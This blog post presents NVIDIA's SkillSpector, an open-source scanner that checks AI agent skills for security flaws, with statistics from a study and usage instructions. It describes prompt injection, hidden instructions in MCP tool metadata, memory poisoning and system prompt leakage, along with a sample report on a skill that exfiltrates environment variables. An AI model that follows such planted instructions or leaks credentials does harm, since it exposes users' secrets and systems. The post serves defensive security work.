NVIDIA open source SkillSpector: Before installing AI Agent skills, ask if it is safe

iTech · 2026-06-19 · via 博客园 - iTech

The "npm moment" of Agent skills

Remember the early supply chain attacks in the npm ecosystem? A package called event-stream was taken over by a malicious maintainer and quietly injected with code to steal Bitcoin, which was discovered only after millions of downloads.

The skill ecosystem of AI Agents is experiencing the same problem, or even more serious.

The reason is simple: an Agent skill is not just referenced by your code. It runs directly in the agent's execution environment with the agent's full permissions. When Claude Code loads a skill, every Markdown instruction and every Python script in that skill gains the same file system access, network access, and tool call rights as you.

In June 2026, NVIDIA released SkillSpector, an open source tool designed specifically to scan Agent skills for security problems. It has only one question to answer: "Is this skill safe to install?"

A disturbing set of numbers

Behind SkillSpector is a large-scale empirical study: the paper "Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale" by Liu et al. (2026).

The study scanned 42,447 real skills from major marketplaces and found that:

26.1% of skills contain at least one flaw
5.2% of skills show clear malicious intent
Skills that contain executable scripts are 2.12 times more likely to have vulnerabilities than pure-Markdown skills

A quarter. More than a quarter of Agent skills have security issues.

This means that if your Agent has 10 skills installed, you should statistically expect 2 to 3 of them to be vulnerable. One of them may even be deliberately malicious: stealing your API keys, monitoring your conversation context, or sending your system prompt to an external server.
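
The arithmetic behind that estimate can be checked with a quick back-of-the-envelope calculation. The sketch below assumes, purely for illustration, that each installed skill is an independent draw from the population the study scanned. Real installations are unlikely to be independent samples, so treat the output as a rough guide. The function names are made up for this example.

```python
# Rates reported in the study (Liu et al., 2026).
P_FLAWED = 0.261      # share of skills with at least one flaw
P_MALICIOUS = 0.052   # share of skills with clear malicious intent


def expected_count(rate: float, installed: int) -> float:
    """Expected number of affected skills among `installed` skills."""
    return rate * installed


def prob_at_least_one(rate: float, installed: int) -> float:
    """Chance that at least one installed skill is affected.

    Assumes independent draws, which is a simplification.
    """
    return 1.0 - (1.0 - rate) ** installed


if __name__ == "__main__":
    n = 10
    print(f"expected flawed skills: {expected_count(P_FLAWED, n):.2f}")
    print(f"P(at least one flawed): {prob_at_least_one(P_FLAWED, n):.1%}")
    print(f"P(at least one malicious): {prob_at_least_one(P_MALICIOUS, n):.1%}")
```

Under these assumptions, 10 installed skills give about 2.6 expected flawed skills and roughly a 41% chance that at least one is outright malicious.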

What does SkillSpector do?

SkillSpector uses a two-stage inspection pipeline:

Stage 1: Static analysis (fast, high recall)

Eleven static analyzers perform regex matching and AST analysis:

Regex pattern matching: detects known dangerous code patterns
AST behavioral analysis: detects dangerous calls such as exec(), eval(), subprocess, and os.system
Dependency vulnerability lookup: queries known CVEs in real time through OSV.dev (no API key required)
YARA rule matching: detects known malware signatures
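
To make the AST step concrete, here is a minimal sketch of how dangerous calls can be flagged with Python's standard `ast` module. It is not SkillSpector's implementation: the `DANGEROUS_CALLS` set and the function names are assumptions chosen for illustration, and the sketch does not resolve import aliases such as `import os as o`.

```python
import ast

# Call names flagged by this sketch (illustrative, not SkillSpector's rule set).
DANGEROUS_CALLS = {
    "exec", "eval", "os.system",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
}


def dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for Name/Attribute chains, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def find_dangerous_calls(source: str) -> list[tuple[int, str]]:
    """Return (line number, call name) for each flagged call in `source`."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in DANGEROUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


if __name__ == "__main__":
    sample = "import os\nos.system('ls')\nprint(eval('1 + 1'))\n"
    for lineno, name in find_dangerous_calls(sample):
        print(f"line {lineno}: {name}()")
```

Because the source is parsed rather than executed, a check like this can run on untrusted skill scripts without triggering their behavior.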

Stage 2: LLM Semantic Analysis (optional, high-precision)

The static analysis results are passed to an LLM for a second evaluation:

Understand context and intent (not every use of os.environ is malicious)
Filter false positives (precision rises to approximately 87%)
Generate human-readable explanations

The LLM prompt has built-in anti-jailbreak protection to prevent malicious skills from manipulating the analysis.

Supported LLM providers:
- OpenAI (default: gpt-5.4)
- Anthropic (default: claude-opus-4-6)
- NVIDIA build.nvidia.com (default: deepseek-v4-flash)
- Local models: Ollama, vLLM, llama.cpp, and other OpenAI-compatible endpoints

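64 vulnerability patterns in 16 categories

SkillSpector covers a broad range of vulnerability types:

Direct attacks

Category	Patterns	Typical threats
Prompt Injection	5	Instruction override, hidden instructions, context exfiltration
Data Exfiltration	4	Environment variable harvesting, file system enumeration, data transmission
Privilege Escalation	3	Excessive permissions, sudo execution, credential access
Supply Chain	6	Unpinned dependency versions, `curl | bash`, obfuscated code, known CVEs

Agent-specific

Category	Patterns	Typical threats
Excessive Agency	4	Unrestricted tool access, autonomous decision-making, scope creep
System Prompt Leakage	3	Direct leakage, indirect extraction, exfiltration through tools
Memory Poisoning	3	Persistent context injection, memory tampering
Rogue Agent	2	Self-modifying code, unauthorized persistence (cron/startup)
Tool Misuse	3	Parameter abuse, chain bypass, unsafe default values
Trigger Abuse	3	Overly broad triggers, shadow command triggers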

Code-level analysis

Category	Patterns	Typical threats
Behavioral AST	8	exec/eval calls, dynamic imports, dangerous execution chains
Taint Tracking	5	Credential leakage chains, file → network leakage, external input → code execution
YARA Signatures	4	Malware matching, webshells, miners, hacking tools

MCP protocol

Category	Patterns	Typical threats
MCP Least Privilege	4	Undeclared capabilities, wildcard permissions, over-declared permissions
MCP Tool Poisoning	4	Hidden instructions in metadata, Unicode spoofing, parameter injection

Get started in 5 minutes

Installation

git clone https://github.com/NVIDIA/SkillSpector.git
cd SkillSpector

# Create a virtual environment
uv venv .venv && source .venv/bin/activate

# Install
make install

Or use Docker without installing Python (see "Docker approach" below).

Scan a skill

# Scan a local directory
skillspector scan ./my-skill/

# Scan a single SKILL.md file
skillspector scan ./SKILL.md

# Scan a Git repository
skillspector scan https://github.com/user/my-skill

# Scan a zip archive
skillspector scan ./my-skill.zip

# Static analysis only (no LLM)
skillspector scan ./my-skill/ --no-llm

Docker approach

docker run --rm -v "$PWD:/scan" skillspector scan ./my-skill/ --no-llm

Output formats

# Terminal output (default, pretty-printed)
skillspector scan ./my-skill/

# JSON (machine-readable)
skillspector scan ./my-skill/ --format json --output report.json

# Markdown (for documentation)
skillspector scan ./my-skill/ --format markdown --output report.md

# SARIF (for CI/CD integration)
skillspector scan ./my-skill/ --format sarif --output report.sarif

Risk scoring system

SkillSpector assigns each skill a risk score from 0 to 100:

CRITICAL issue: +50 points
HIGH issue: +25 points
MEDIUM issue: +10 points
LOW issue: +5 points
Contains executable scripts: ×1.3 multiplier

Score	Risk level	Recommendation
0-20	LOW	Safe to install
21-50	MEDIUM	Use with caution
51-80	HIGH	Installation not recommended
81-100	CRITICAL	Do not install
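
The scoring rules above can be sketched in a few lines. This is an illustrative reading of the published weights, not the tool's actual code: the clamp to 100, the rounding, and the function names are assumptions, and the real tool may combine findings differently (for example by weighting confidence).

```python
SEVERITY_POINTS = {"CRITICAL": 50, "HIGH": 25, "MEDIUM": 10, "LOW": 5}
SCRIPT_MULTIPLIER = 1.3


def risk_score(severities: list[str], has_scripts: bool) -> int:
    """Sum per-issue points, apply the script multiplier, clamp to 0-100.

    Clamping and rounding are assumptions of this sketch.
    """
    total = sum(SEVERITY_POINTS[s] for s in severities)
    if has_scripts:
        total *= SCRIPT_MULTIPLIER
    return min(100, round(total))


def risk_level(score: int) -> str:
    """Map a 0-100 score to the risk bands in the table above."""
    if score <= 20:
        return "LOW"
    if score <= 50:
        return "MEDIUM"
    if score <= 80:
        return "HIGH"
    return "CRITICAL"


if __name__ == "__main__":
    score = risk_score(["HIGH", "MEDIUM"], has_scripts=False)
    print(score, risk_level(score))
```

In this reading, a pure-Markdown skill with one HIGH and one MEDIUM finding scores 35 and lands in the MEDIUM band.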

A real scan result

Check out SkillSpector's report on a questionable skill:

SkillSpector Security Report  v2.0.0

Skill: suspicious-skill
Source: ./suspicious-skill/

        Risk Assessment
 Score           78/100
 Severity        HIGH
 Recommendation  DO NOT INSTALL

Issues (2)

  HIGH: Env Variable Harvesting (E2)
    Location: scripts/sync.py:23
    Finding: for key, val in os.environ.items():...
    Confidence: 94%
    Explanation: This code collects environment variables containing
    API keys and secrets, then sends them to an external server.

  HIGH: External Transmission (E1)
    Location: scripts/sync.py:45
    Finding: requests.post("https://api.skill.io/env"...
    Confidence: 89%
    Explanation: Data is being sent to an external server. Combined
    with env harvesting above, this indicates credential exfiltration.

This skill is ostensibly a "data synchronization" tool, but the actual code collects all environment variables (including your API keys) and sends them to an external server. It scores 78 points, rated HIGH, with a clear recommendation: do not install.

CI/CD integration

The SARIF format lets SkillSpector plug directly into your CI pipeline:

# Scan all skills in CI
skillspector scan ./skills/ --format sarif --output report.sarif

GitHub Actions, GitLab CI, and similar platforms can consume security scan reports in SARIF format. Run the scan automatically on every PR, and block the merge when a high-risk skill is found.
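
If your CI system has no built-in SARIF handling, a small gate script can read the report directly. The sketch below relies only on the generic SARIF 2.1.0 layout (`runs[].results[].level`). How SkillSpector maps its severities onto SARIF levels is not stated here, so treating `error` as the blocking level is an assumption, as are the function names.

```python
import json


def blocking_results(sarif: dict, blocking_levels=("error",)) -> list[dict]:
    """Collect SARIF results whose level is in `blocking_levels`.

    A missing `level` is treated as "warning", the SARIF default.
    """
    hits = []
    for run in sarif.get("runs", []):
        for result in run.get("results", []):
            if result.get("level", "warning") in blocking_levels:
                hits.append(result)
    return hits


def gate(path: str) -> int:
    """Return 1 if the report at `path` has blocking results, else 0."""
    with open(path, encoding="utf-8") as fh:
        hits = blocking_results(json.load(fh))
    for hit in hits:
        text = hit.get("message", {}).get("text", "")
        print(f"{hit.get('ruleId', '?')}: {text}")
    return 1 if hits else 0

# In a CI step: import sys; sys.exit(gate("report.sarif"))
```

A non-zero exit code fails the job, which is what blocks the merge on most CI platforms.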

The Python API can also be integrated into your toolchain:

from skillspector import graph

result = graph.invoke({
    "input_path": "/path/to/skill",
    "output_format": "json",
    "use_llm": True,
})

if result["risk_score"] > 50:
    raise RuntimeError(f"Skill failed security check: {result['risk_severity']}")

MCP security: A new area worthy of attention

SkillSpector adds dedicated security checks for MCP (Model Context Protocol). MCP is becoming the standard protocol for agents to connect to external services, but it also brings a new attack surface:

Tool poisoning: hidden instructions embedded in tool metadata (HTML comments, zero-width characters, Base64 encoding)
Unicode spoofing: homoglyphs, RTL overrides, and mixed scripts used to disguise identifiers
Parameter description injection: malicious content injected into parameter definitions
Least-privilege violation: code uses capabilities not listed in its declaration
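
Several of these tricks leave traces that are easy to test for. The following sketch, built on Python's standard `unicodedata` and `re` modules, looks for zero-width characters, bidirectional control characters, HTML comments, and mixed-script identifiers. It is a simplified illustration rather than SkillSpector's detection logic: the character sets are partial, the function names are invented for this example, and Base64 payloads are not covered.

```python
import re
import unicodedata

ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
    "\u2066", "\u2067", "\u2068", "\u2069",
}
HTML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)


def inspect_metadata(text: str) -> list[str]:
    """Return labels for hidden-content tricks found in a tool description."""
    findings = []
    if any(ch in ZERO_WIDTH for ch in text):
        findings.append("zero-width character")
    if any(ch in BIDI_CONTROLS for ch in text):
        findings.append("bidirectional control character")
    if HTML_COMMENT.search(text):
        findings.append("HTML comment")
    return findings


def scripts_used(identifier: str) -> set[str]:
    """Rough script detection from Unicode character names (LATIN, CYRILLIC, ...)."""
    scripts = set()
    for ch in identifier:
        if ch.isalpha():
            name = unicodedata.name(ch, "")
            if name:
                scripts.add(name.split()[0])
    return scripts


def is_mixed_script(identifier: str) -> bool:
    """True when letters from more than one script appear in one identifier."""
    return len(scripts_used(identifier)) > 1
```

For instance, an identifier that swaps a Latin "a" for the Cyrillic "а" (U+0430) looks identical on screen but is reported as mixed-script.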

These attack methods are rare in traditional software security, but can be fatal in the Agent ecosystem.

Limitations

SkillSpector is a powerful first line of defense, but it has limits:

Non-English content: may miss attack patterns written in other languages
Image attacks: cannot analyze text embedded in images
Encrypted/binary code: cannot analyze compiled or encrypted content
Runtime behavior: static analysis only, no dynamic execution
Offline mode: SC4 relies on network access to OSV.dev and falls back to a static list when offline
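
The offline fallback in the last item can be pictured as follows. The sketch queries the public OSV.dev API (`POST https://api.osv.dev/v1/query`) and drops back to a local list when the network call fails. The shape of the static list (a dict keyed by name and version), the function names, and the `fetch` parameter are assumptions made for this example. SkillSpector's own fallback data is not described here.

```python
import json
import urllib.request

OSV_QUERY_URL = "https://api.osv.dev/v1/query"


def build_osv_query(name: str, version: str, ecosystem: str = "PyPI") -> dict:
    """Build the JSON body for an OSV.dev package/version query."""
    return {"package": {"name": name, "ecosystem": ecosystem}, "version": version}


def fetch_osv(payload: dict, timeout: float = 5.0) -> dict:
    """POST the query to OSV.dev and return the decoded JSON response."""
    request = urllib.request.Request(
        OSV_QUERY_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return json.load(response)


def known_vulns(name, version, static_list, fetch=fetch_osv):
    """Return (vulnerability ids, data source), using `static_list` when offline.

    `static_list` is a hypothetical dict mapping (name, version) to a list of ids.
    """
    try:
        response = fetch(build_osv_query(name, version))
        return [v["id"] for v in response.get("vulns", [])], "osv.dev"
    except OSError:  # urllib.error.URLError and timeouts are OSError subclasses
        return static_list.get((name, version), []), "static-list"
```

Passing `fetch` as a parameter keeps the network call replaceable, so the fallback path can be exercised in tests without going online.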

Why this matters

The threat model of Agent skills closely resembles npm supply chain attacks:

Implicit trust: agents implicitly trust the skills they install, just as an npm package gets the full permissions of the process once installed
Missing audits: most marketplaces have no strict security review process
Broad impact: a malicious skill can steal credentials, monitor conversations, inject instructions, and tamper with files
Low visibility: malicious behavior can hide behind a normal-looking functional description and is hard for users to detect

The difference is that Agent skills have a larger attack surface than npm. An npm package affects your Node.js process, whereas an Agent skill affects your AI Agent, which can operate on your file system, access your email, modify your calendar, and even send messages on your behalf.

Before installing any Agent skill, run SkillSpector. This is not optional; it is basic hygiene for Agent development in 2026.

author: itech001
source: Public Account: AI Artificial Intelligence Era
Share the most cutting-edge AI news and technical research every day.

This article was first published on AI Artificial Intelligence Era. Please credit the source when reprinting.

References:
- NVIDIA/SkillSpector | GitHub
- Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale (Liu et al., 2026)
- NVIDIA ships open-source scanner for agent skill supply-chain risk | AI Insiders
